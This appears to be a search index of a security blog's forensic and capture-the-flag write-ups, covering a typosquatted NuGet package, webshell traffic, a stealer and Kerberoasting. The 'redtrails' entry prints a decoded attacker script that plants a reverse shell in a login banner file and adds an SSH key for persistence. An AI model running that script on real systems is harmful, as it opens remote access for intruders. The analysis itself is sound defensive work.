[{"content":"Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command) Review the PowerShell history file:\nConsoleHost_history.txt\nLook for commands related to NuGet package installation.\nIdentify the full command used to install the package.\nQ2: Identify the URL from which the package was downloaded? Examine the web browsing history on the system.\nLocate the URL used to download the NuGet package.\nQ3: Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher) Visit the NuGet package page and review its metadata.\nIdentify the package author/publisher.\nQ4: When did the attacker initiate the download of the package? Provide the timestamp in UTC format (YYYY-MM-DD HH:MM) Analyze Shellbags artifacts to determine folder access activity.\nExtract the timestamp and convert it to UTC.\nQ5: Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package? Inspect the package contents and locate the .nuspec file.\nIdentify the modified package ID defined within.\nQ6: Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name) Analyze the package naming convention.\nA slight modification (e.g., removing a single character) was used to mimic a legitimate package.\nTechnique: Typosquatting\nQ7: Determine the full path of the file within the package containing the malicious code? Navigate to the default NuGet package installation directory.\nLocate the file (e.g., init.ps1) containing the malicious code and record its full path.\nQ8: When tampering with the system\u0026rsquo;s security settings, what command did the attacker employ? 
Inspect the contents of the malicious script (e.g., init.ps1).\nIdentify the command(s) used to modify or disable security settings.\nQ9: Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file. Analyze the script to identify the downloaded file (e.g., uninstall.exe).\nSearch for this file in forensic tools such as Autopsy or security logs.\nCheck Windows Defender MP logs for the SHA1 hash.\nQ10: Identify the framework utilised by the malicious file for command and control communication. TBD\nQ11: At what precise moment was the malicious file executed? Analyze Prefetch files using tools such as:\nPECmd Timeline Explorer Export the timeline and search for the execution of the malicious binary (e.g., uninstall.exe).\nQ12: The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC. Check Windows Defender Operational logs for:\nEvent ID 1117\nSearch for references to the malicious file.\nExtract and convert the timestamp to UTC.\nQ13: After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process. Review the Prefetch timeline.\nIdentify processes executed shortly after the malicious binary.\nThe enumeration command can be identified from this sequence.\nQ14: To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task? Navigate to:\nC:\\Windows\\System32\\Tasks\nLook for unusual or suspicious scheduled tasks.\nIdentify the malicious task name.\nQ15: When was the scheduled task created? Provide the timestamp in UTC. 
Open the corresponding task XML file.\nLocate the creation timestamp and convert it to UTC.\nQ16: Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file? Search for unusual executables on disk (e.g., in C:\\ProgramData).\nAnalyze suspicious files using threat intelligence platforms.\nQ17: As an anti-forensics measure, the threat actor changed the file name after executing it. What is the new file name? Investigate file renaming activity using:\nTimeline analysis File system artifacts (e.g., MFT) Identify the renamed file.\nQ18: Identify the malware family associated with the file mentioned in the previous question (17). Use threat intelligence sources (e.g., VirusTotal).\nCheck:\nDetection names Community analysis Identify the most consistent malware family classification.\nQ19: When was the file dropped onto the system? Provide the timestamp in UTC. Parse the Master File Table (MFT) using tools such as MFTECmd.\nLoad the timeline into Timeline Explorer and search for the file (e.g., Updater.exe).\nExtract the file creation timestamp and convert it to UTC.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/nuts/","summary":"\u003ch1 id=\"q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command\"\u003eQ1: What action did Alex take to integrate the purported time-saving package into the deployment process? 
(provide the full command)\u003c/h1\u003e\n\u003cp\u003eReview the PowerShell history file:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003eConsoleHost_history.txt\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eLook for commands related to NuGet package installation.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"History\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/nuts/2024-09-22T22:56:27,889083437+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the full command used to install the package.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-identify-the-url-from-which-the-package-was-downloaded-\"\u003eQ2: Identify the URL from which the package was downloaded?\u003c/h1\u003e\n\u003cp\u003eExamine the \u003cstrong\u003eweb browsing history\u003c/strong\u003e on the system.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Url\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/nuts/2024-10-13T18_19_20,030404275+02_00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the URL used to download the NuGet package.\u003c/p\u003e","title":"nuts"},{"content":"Introduction The flag is split into three parts. In this investigation, we were able to recover two parts. We start from a provided .pcap file.\n1st part The capture contains two HTTP frames. The second frame is large and contains interesting data.\nLoad the payload in CyberChef. Apply reverse and Base64 decode operations. 
After decoding, deobfuscate the bash script manually.\n#!/bin/bash lhJVXukWibAFfkv() { echo \u0026#39;bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.0.200/1337 0\u0026gt;\u0026amp;1\u0026#34;\u0026#39; \u0026gt; /etc/update-motd.d/00-header } x7KG0bvubT6dID2() { echo -e \u0026#34;\\nssh-rsa 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HTB{r3d15_1n574nc35\u0026#34; \u0026gt;\u0026gt; ~/.ssh/authorized_keys } hL8FbEfp9L1261G() { lhJVXukWibAFfkv x7KG0bvubT6dID2 } hL8FbEfp9L1261G The script reveals the first flag embedded in an ssh-rsa key.\n1st Flag: Embedded in ssh-rsa key: HTB{r3d15_1n574nc35} 2nd part The RESP protocol in the capture was notable. Refer to the Redis protocol spec. Follow the TCP stream in Wireshark to locate the data at the end of the stream. ⚠️ The flag is case-sensitive. Ensure correct capitalization when capturing.\n2nd Flag: Extracted from the TCP stream. 3rd part Binwalk revealed an ELF file within the capture. VirusTotal confirmed it is malicious. 3rd Flag: TBD ","permalink":"https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eThe flag is split into \u003cstrong\u003ethree parts\u003c/strong\u003e. In this investigation, we were able to recover \u003cstrong\u003etwo parts\u003c/strong\u003e. We start from a provided \u003ccode\u003e.pcap\u003c/code\u003e file.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"1st-part\"\u003e1st part\u003c/h1\u003e\n\u003cp\u003eThe capture contains \u003cstrong\u003etwo HTTP frames\u003c/strong\u003e. 
The second frame is large and contains interesting data.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eLoad the payload in \u003cstrong\u003eCyberChef\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eApply \u003cstrong\u003ereverse\u003c/strong\u003e and \u003cstrong\u003eBase64 decode\u003c/strong\u003e operations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cimg alt=\"CyberChef\" loading=\"lazy\" src=\"/writeups/htb/challenges/redtrails/2024-10-08T21:38:10,624043836+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eAfter decoding, deobfuscate the \u003cstrong\u003ebash script\u003c/strong\u003e manually.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"cp\"\u003e#!/bin/bash\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elhJVXukWibAFfkv\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nb\"\u003eecho\u003c/span\u003e \u003cspan class=\"s1\"\u003e\u0026#39;bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.0.200/1337 0\u0026gt;\u0026amp;1\u0026#34;\u0026#39;\u003c/span\u003e \u0026gt; /etc/update-motd.d/00-header\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ex7KG0bvubT6dID2\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan 
class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nb\"\u003eecho\u003c/span\u003e -e \u003cspan class=\"s2\"\u003e\u0026#34;\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35\u0026#34;\u003c/span\u003e \u0026gt;\u0026gt; ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\t\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehL8FbEfp9L1261G\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\tlhJVXukWibAFfkv\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\tx7KG0bvubT6dID2\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehL8FbEfp9L1261G\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThe script reveals the \u003cstrong\u003efirst flag\u003c/strong\u003e embedded in an \u003ccode\u003essh-rsa\u003c/code\u003e key.\u003c/p\u003e","title":"redtrails"},{"content":"Introduction We are provided with two files:\nA PCAP file A PHP file PCAP Analysis Start by analyzing the PCAP before fully deobfuscating support.php.\nFilter for HTTP POST requests:\nOnly 4 POST requests are present.\nFollow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:\n0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5\nThese strings will be used as input for the PHP deobfuscation.\nPHP Analysis The provided PHP script performs multiple layers of obfuscation:\nPattern extraction using $kh and $kf Base64 decoding XOR decryption using key 80e32263 Gzip decompression To analyze it:\nExecute the script locally or via an online PHP interpreter Replace $input_string with values extracted from the PCAP You can:\nManually replicate each decoding step Or automate the process using scripts / tools Deobfuscation Process Using the extracted POST data as input:\nRun it through the PHP function Recover the decoded payload The output is still encoded — decode it again (e.g., with CyberChef): This results in a downloadable file: KeePassXC Analysis The extracted file is a KeePass database.\nTo recover credentials:\nUse keepass4brute Use a common wordlist such as rockyou.txt After 21444 attempts, the correct password is found.\nYou can now open the database:\n","permalink":"https://mikehorn-git.github.io/writeups/htb/challenges/obscure/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eWe are provided with two files:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA \u003cstrong\u003ePCAP 
file\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eA \u003cstrong\u003ePHP file\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch1 id=\"pcap-analysis\"\u003ePCAP Analysis\u003c/h1\u003e\n\u003cp\u003eStart by analyzing the PCAP before fully deobfuscating \u003ccode\u003esupport.php\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFilter for \u003cstrong\u003eHTTP POST\u003c/strong\u003e requests:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"POST\" loading=\"lazy\" src=\"./assets/2024-09-28T23:17:53,862253486+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eOnly \u003cstrong\u003e4 POST requests\u003c/strong\u003e are present.\u003c/p\u003e\n\u003cp\u003eFollow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003e0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"STREAM\" loading=\"lazy\" src=\"./assets/2024-09-28T23:22:19,040121186+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eThese strings will be used as input for the PHP deobfuscation.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"php-analysis\"\u003ePHP Analysis\u003c/h1\u003e\n\u003cp\u003eThe provided PHP script performs multiple layers of obfuscation:\u003c/p\u003e","title":"obscure"},{"content":"Introduction Tools recommended by the author (important for this analysis):\nWhois VirusTotal MalwareBazaar ThreatFox Q1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. What\u0026rsquo;s the identified malware\u0026rsquo;s category? 
Submit the file hash to VirusTotal and review the main summary page.\nIdentify the malware category based on detection labels and classification.\nQ2: Clear identification of the malware file name facilitates better communication among the SOC team. What\u0026rsquo;s the file name associated with this malware? On the VirusTotal main/detection page, locate the file details.\nIdentify the file name associated with the malware.\nQ3: Knowing the exact time the malware was first seen can help prioritize actions. If the malware is newly detected, it may warrant more urgent containment and eradication efforts compared to older, well-known threats. Can you provide the UTC timestamp of first submission of this malware on VirusTotal? Navigate to the Detection tab in VirusTotal.\nLocate the first submission timestamp and ensure it is in UTC format.\nQ4: Understanding the techniques used by malware helps in strategic security planning. What is the MITRE ATT\u0026amp;CK technique ID for the malware\u0026rsquo;s data collection from the system before exfiltration? In VirusTotal, go to the MITRE ATT\u0026amp;CK section.\nNavigate to:\nCollection → Data from Local System\nIdentify the corresponding technique ID.\nQ5: Following execution, what domain name resolution is performed by the malware? In VirusTotal, review the DNS Resolutions section.\nIdentify the domain(s) queried by the malware.\nQ6: Once the malicious IP addresses are identified, network security devices such as firewalls can be configured to block traffic to and from these addresses. Can you provide the IP address and destination port the malware communicates with? In VirusTotal, check the IP Traffic section.\nIdentify:\nThe malicious IP address The destination port Q7: YARA rules are designed to identify specific malware patterns and behaviors. What\u0026rsquo;s the name of the YARA rule created by \u0026ldquo;Varp0s\u0026rdquo; that detects the identified malware? 
Search for the sample on MalwareBazaar using:\nsha256:\u0026lt;hash\u0026gt;\nNavigate to the YARA section.\nIdentify the YARA rule authored by Varp0s.\nQ8: Understanding which malware families are targeting the organization helps in strategic security planning for the future and prioritizing resources based on the threat. Can you provide the different malware alias associated with the malicious IP address? Use ThreatFox and search with:\nioc:\u0026lt;IP\u0026gt;\nIdentify the different malware aliases associated with the IP address.\nQ9: By identifying the malware\u0026rsquo;s imported DLLs, we can configure security tools to monitor for the loading or unusual usage of these specific DLLs. Can you provide the DLL utilized by the malware for privilege escalation? Return to VirusTotal and review the Imports section.\nIdentify the DLL associated with privilege escalation functions such as:\nAdjustTokenPrivileges GetTokenInformation LookupPrivilegeValueA ","permalink":"https://mikehorn-git.github.io/writeups/cyberdefenders/red_stealer/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eTools recommended by the author (important for this analysis):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhois\u003c/li\u003e\n\u003cli\u003eVirusTotal\u003c/li\u003e\n\u003cli\u003eMalwareBazaar\u003c/li\u003e\n\u003cli\u003eThreatFox\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch1 id=\"q1-categorizing-malware-allows-for-a-quicker-and-easier-understanding-of-the-malware-aiding-in-understanding-its-distinct-behaviors-and-attack-vectors-whats-the-identified-malwares-category\"\u003eQ1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. 
What\u0026rsquo;s the identified malware\u0026rsquo;s category?\u003c/h1\u003e\n\u003cp\u003eSubmit the file hash to \u003cstrong\u003eVirusTotal\u003c/strong\u003e and review the main summary page.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"MainPage\" loading=\"lazy\" src=\"/writeups/cyberdefenders/red_stealer/2024-09-28T16:05:54,875091188+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the malware \u003cstrong\u003ecategory\u003c/strong\u003e based on detection labels and classification.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-clear-identification-of-the-malware-file-name-facilitates-better-communication-among-the-soc-team-whats-the-file-name-associated-with-this-malware\"\u003eQ2: Clear identification of the malware file name facilitates better communication among the SOC team. What\u0026rsquo;s the file name associated with this malware?\u003c/h1\u003e\n\u003cp\u003eOn the \u003cstrong\u003eVirusTotal\u003c/strong\u003e main/detection page, locate the file details.\u003c/p\u003e","title":"red stealer"},{"content":"Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command) Review the PowerShell history file:\nConsoleHost_history.txt\nLook for commands related to NuGet package installation.\nIdentify the full command used to install the package.\nQ2: Identify the URL from which the package was downloaded? Examine the web browsing history on the system.\nLocate the URL used to download the NuGet package.\nQ3: Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher) Visit the NuGet package page and review its metadata.\nIdentify the package author/publisher.\nQ4: When did the attacker initiate the download of the package? 
Provide the timestamp in UTC format (YYYY-MM-DD HH:MM) Analyze Shellbags artifacts to determine folder access activity.\nExtract the timestamp and convert it to UTC.\nQ5: Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package? Inspect the package contents and locate the .nuspec file.\nIdentify the modified package ID defined within.\nQ6: Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name) Analyze the package naming convention.\nA slight modification (e.g., removing a single character) was used to mimic a legitimate package.\nTechnique: Typosquatting\nQ7: Determine the full path of the file within the package containing the malicious code? Navigate to the default NuGet package installation directory.\nLocate the file (e.g., init.ps1) containing the malicious code and record its full path.\nQ8: When tampering with the system\u0026rsquo;s security settings, what command did the attacker employ? Inspect the contents of the malicious script (e.g., init.ps1).\nIdentify the command(s) used to modify or disable security settings.\nQ9: Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file. Analyze the script to identify the downloaded file (e.g., uninstall.exe).\nSearch for this file in forensic tools such as Autopsy or security logs.\nCheck Windows Defender MP logs for the SHA1 hash.\nQ10: Identify the framework utilised by the malicious file for command and control communication. Analyze the malicious binary using:\nStatic analysis tools Threat intelligence platforms (e.g., VirusTotal) Identify the C2 framework used by the malware.\nQ11: At what precise moment was the malicious file executed? 
Analyze Prefetch files using tools such as:\nPECmd Timeline Explorer Export the timeline and search for the execution of the malicious binary (e.g., uninstall.exe).\nQ12: The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC. Check Windows Defender Operational logs for:\nEvent ID 1117\nSearch for references to the malicious file.\nExtract and convert the timestamp to UTC.\nQ13: After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process. Review the Prefetch timeline.\nIdentify processes executed shortly after the malicious binary.\nThe enumeration command can be identified from this sequence.\nQ14: To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task? Navigate to:\nC:\\Windows\\System32\\Tasks\nLook for unusual or suspicious scheduled tasks.\nIdentify the malicious task name.\nQ15: When was the scheduled task created? Provide the timestamp in UTC. Open the corresponding task XML file.\nLocate the creation timestamp and convert it to UTC.\nQ16: Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file? Search for unusual executables on disk (e.g., in C:\\ProgramData).\nAnalyze suspicious files using threat intelligence platforms.\nQ17: As an anti-forensics measure, the threat actor changed the file name after executing it. What is the new file name? Investigate file renaming activity using:\nTimeline analysis File system artifacts (e.g., MFT) Identify the renamed file.\nQ18: Identify the malware family associated with the file mentioned in the previous question (17). 
Use threat intelligence sources (e.g., VirusTotal).\nCheck:\nDetection names Community analysis Identify the most consistent malware family classification.\nQ19: When was the file dropped onto the system? Provide the timestamp in UTC. Parse the Master File Table (MFT) using tools such as MFTECmd.\nLoad the timeline into Timeline Explorer and search for the file (e.g., Updater.exe).\nExtract the file creation timestamp and convert it to UTC.\n","permalink":"https://mikehorn-git.github.io/writeups/cyberdefenders/reveal/","summary":"\u003ch1 id=\"q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command\"\u003eQ1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)\u003c/h1\u003e\n\u003cp\u003eReview the PowerShell history file:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003eConsoleHost_history.txt\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eLook for commands related to NuGet package installation.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"History\" loading=\"lazy\" src=\"./2024-09-22T22:56:27,889083437+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the full command used to install the package.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-identify-the-url-from-which-the-package-was-downloaded-\"\u003eQ2: Identify the URL from which the package was downloaded?\u003c/h1\u003e\n\u003cp\u003eExamine the \u003cstrong\u003eweb browsing history\u003c/strong\u003e on the system.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Url\" loading=\"lazy\" src=\"./2024-10-13T18_19_20,030404275+02_00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the URL used to download the NuGet package.\u003c/p\u003e","title":"reveal"},{"content":"Q1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash. 
Identify the SHA256 hash of the suspicious binary file.\nFile Name: Superstar_MemberCard.tiff.exe SHA256: 12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3\nQ2: When was the binary file originally created, according to its metadata (UTC)? Upload the file hash to VirusTotal to retrieve metadata information.\nLocate the first seen / creation timestamp and convert it to UTC.\nQ3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary? Use a tool such as readpe to inspect the binary structure.\nThis will provide details about the code section size within the executable.\nQ4: It appears that the binary may have undergone a file conversion process. Could you determine its original filename? Use the strings utility to extract readable content from the binary.\nSearch for references to script or executable names.\nYou should identify the original filename:\nnewILY.ps1\nQ5: Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary. Locate the obfuscated content within the binary.\nThen use hexdump to determine the exact hexadecimal offset where this content begins.\nQ6: The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation? From the extracted content, identify the encoding method used.\nThe encoding method is Base64\nQ7: What is the specific cmdlet utilized that was used to initiate file downloads? Decode the embedded script and analyze its contents.\nIdentify the PowerShell cmdlet used to download files:\nInvoke-WebRequest\nQ8: Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order. 
Inspect the decoded script for network indicators.\nYou should find IP addresses embedded in the payload (e.g., in specific lines of the script).\nList them in ascending order, separated by commas.\nQ9: The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored? In the decoded script, locate the variable defining the staging directory:\n$targetDir\nThis value specifies where collected files are stored.\nQ10: What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data? Refer to the MITRE ATT\u0026amp;CK framework.\nNavigate to:\nCollection → Automated Collection\nIdentify the corresponding MITRE Technique ID.\nQ11: What is the password utilized to exfiltrate the collected files through the file transfer program within the binary? Analyze the decoded script further.\nLocate the section where file transfer (e.g., SFTP) is configured.\nThe password used for exfiltration is defined alongside the connection details (e.g., near the second IP address).\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/heartbreaker-continuum/","summary":"\u003ch1 id=\"q1-to-accurately-reference-and-identify-the-suspicious-binary-please-provide-its-sha256-hash\"\u003eQ1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.\u003c/h1\u003e\n\u003cp\u003eIdentify the SHA256 hash of the suspicious binary file.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eFile Name:\u003c/strong\u003e \u003ccode\u003eSuperstar_MemberCard.tiff.exe\u003c/code\u003e\n\u003cstrong\u003eSHA256:\u003c/strong\u003e \u003ccode\u003e12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-when-was-the-binary-file-originally-created-according-to-its-metadata-utc\"\u003eQ2: When was the binary file originally created, according to its 
metadata (UTC)?\u003c/h1\u003e\n\u003cp\u003eUpload the file hash to \u003cstrong\u003eVirusTotal\u003c/strong\u003e to retrieve metadata information.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"VT\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/heartbreaker-continuum/2024-09-22T11:34:24,713072253+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the \u003cstrong\u003efirst seen / creation timestamp\u003c/strong\u003e and convert it to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q3-examining-the-code-size-in-a-binary-file-can-give-indications-about-its-functionality-could-you-specify-the-byte-size-of-the-code-in-this-binary\"\u003eQ3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?\u003c/h1\u003e\n\u003cp\u003eUse a tool such as \u003cstrong\u003ereadpe\u003c/strong\u003e to inspect the binary structure.\u003c/p\u003e","title":"heartbreaker-continuum"},{"content":"Q1: Analyzing Domain Controller Security Logs Can you confirm the date and time when the Kerberoasting activity occurred?\nOpen Event Viewer on the Windows VM and search for Event ID 4769.\n🕒 Remember to convert your local time to UTC.\nQ2: Targeted Service Name What is the Service Name that was targeted?\nCheck the \u0026ldquo;Service Information\u0026rdquo; section of the same event:\nQ3: Workstation Identification Identify the Workstation IP Address from which the activity originated.\nIn the same event, look under Network Information → Client Address:\nClient Address: 172.17.79.129\nQ4: Script Enumeration for Kerberoastable Accounts Now that we have the workstation, review the provided PowerShell logs and Prefetch files to understand how this activity occurred. 
We’re looking for the file used to enumerate Active Directory objects and find Kerberoastable accounts.\nSearch the Microsoft-Windows-PowerShell/Operational log for Event ID 4104 (script block logging); the logged script block includes the path of the script file and its contents.\nQ5: Script Execution Time When was this script executed?\nRefer again to Event ID 4104, and convert the timestamp to UTC.\n🕒 Execution Time (UTC): 2024-05-21 03:16:32\nQ6: Kerberoasting Tool Path Determine the full path of the tool used to perform the actual Kerberoasting attack.\nUse PECmd for Prefetch analysis.\nThen, open the exported timeline .csv using Timeline Explorer.\nQ7: Tool Execution Time When was the tool executed to dump credentials?\nYou can find this information in the previous screenshot (Prefetch timeline CSV output). Prefetch stores the last run time and, on Windows 8 and later, up to seven earlier run times, so pick the run that falls inside the attack window rather than assuming the most recent one.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/campfire-1/","summary":"\u003ch1 id=\"q1-analyzing-domain-controller-security-logs\"\u003eQ1: Analyzing Domain Controller Security Logs\u003c/h1\u003e\n\u003cp\u003eCan you confirm the \u003cstrong\u003edate and time\u003c/strong\u003e when the \u003cem\u003eKerberoasting\u003c/em\u003e activity 